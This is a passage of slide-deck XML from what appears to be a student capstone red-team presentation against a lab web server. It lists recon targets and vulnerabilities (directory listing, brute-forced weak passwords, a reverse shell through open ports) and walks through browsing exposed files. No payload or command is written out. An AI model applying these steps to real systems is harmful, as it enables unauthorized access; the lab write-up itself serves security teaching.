              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="223" name="Google Shape;223;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="284275" y="627325"/>
            <a:ext cx="6535624" cy="428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3"/>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229" name="Google Shape;229;p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0" name="Google Shape;230;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1851100"/>
            <a:ext cx="8595300" cy="102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a:t>Red Team</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="30555"/>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1" name="Google Shape;231;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Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Google Shape;237;p24"/>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10000"/>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238" name="Google Shape;238;p2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239" name="Google Shape;239;p24"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198750"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{4D080070-8182-4C4D-ABE0-365803A54136}</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CAPSTONE</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192.168.1.105</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The Target Machine</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r>
              <a:tr h="793475">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KALI</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192.168.1.90</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The Attacker Machine</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r>
              <a:tr h="793475">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ELK</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192.168.1.100</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Kibana Visualization of Attack Logs</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r>
              <a:tr h="793475">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ML-REFVM-684427</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="F7EF6A"/>
                        </a:highlight>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192.168.1.1</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Gateway/NAT Switch</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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45818E"/>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Vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Assessment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Google Shape;245;p25"/>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246" name="Google Shape;246;p2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247" name="Google Shape;247;p25"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1201900"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{4D080070-8182-4C4D-ABE0-365803A54136}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
              </a:tblGrid>
              <a:tr h="397450">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>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b="1" lang="en">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>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C343D"/>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C343D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1005350">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" i="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Directory listing enabled</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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Able to use browser to visit Capstone IP address and view directories of Capstone web server</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Information Disclosure: User ‘Ashton’ found to be owner of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>/company_folders/secret_folder/ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>; Attacker can use this information for further exploitation</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r>
              <a:tr h="988875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" i="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Weak User Authentication</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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Able to conduct brute force attack to obtain password via rockyou.txt; Password is weak and lacks lockout rule for failed login attempts </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Successful Brute Force Attack: Resulted in the password for Ryan’s </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>/secret_folder/ </a:t>
                      </a:r>
                      <a:endParaRPr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r>
              <a:tr h="767375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" i="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Firewall Misconfigurations</a:t>
                      </a:r>
                      <a:endParaRPr b="1" i="1"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Able to gain access to Capstone web server by executing reverse shell payload using open ports</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Unauthorized Access: Attacker now has unauthorized and undetected control of Capstone web server</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">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5818E"/>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Exploitation: Directory Listing Enabled</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Google Shape;253;p2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54" name="Google Shape;254;p2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To view the the Capstone  server file structure, we entered </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://192.168.1.105</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>into a web browser. Since Directory Listing was enabled, this provided us full access to the company files.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="256" name="Google Shape;256;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="257" name="Google Shape;257;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6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="260" name="Google Shape;260;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attacker discovered that user ‘Ashton’ was owner of </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/company_folders/secret_folder/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> by viewing contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>meet_our_team/ashton.txt.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="264" name="Google Shape;264;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="265" name="Google Shape;265;p2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66" name="Google Shape;266;p2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6"/>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Evidence</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i="1" sz="11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rPr i="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>“I can’t believe that they have me managing the company_folders/secre</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>t_folder!” </a:t>
            </a:r>
            <a:endParaRPr i="1"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 Ashton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rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Full screenshots on next slide.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="9E9E9E"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="9E9E9E"/>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lt1"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="accent6"/>
              </a:highlight>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269" name="Google Shape;269;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6485938" y="2149949"/>
            <a:ext cx="2258982" cy="38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Evidence of Vulnerability: Directory Listing Enabled</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="Google Shape;275;p2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276" name="Google Shape;276;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2002275" y="3852237"/>
            <a:ext cx="5039057" cy="866525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="277" name="Google Shape;277;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2002275" y="797250"/>
            <a:ext cx="1902076" cy="1398224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="278" name="Google Shape;278;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2002275" y="2362637"/>
            <a:ext cx="1902075" cy="1367913"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="Google Shape;279;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="230300" y="875175"/>
            <a:ext cx="15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80" name="Google Shape;280;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291725" y="721050"/>
            <a:ext cx="1566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1</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Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://192.168.1.105</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t> in web browser and view files</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Lato"/>
              <a:ea typeface="Lato"/>
              <a:cs typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="Google Shape;281;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291725" y="2286425"/>
            <a:ext cx="1566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2</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Click on </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>meet_our_team/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t> to see the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>ashton.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Lato"/>
              <a:ea typeface="Lato"/>
              <a:cs typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Google Shape;282;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291725" y="3775600"/>
            <a:ext cx="1566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3</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Note that Ashton manages the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>company_folders/secret_folder/</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="11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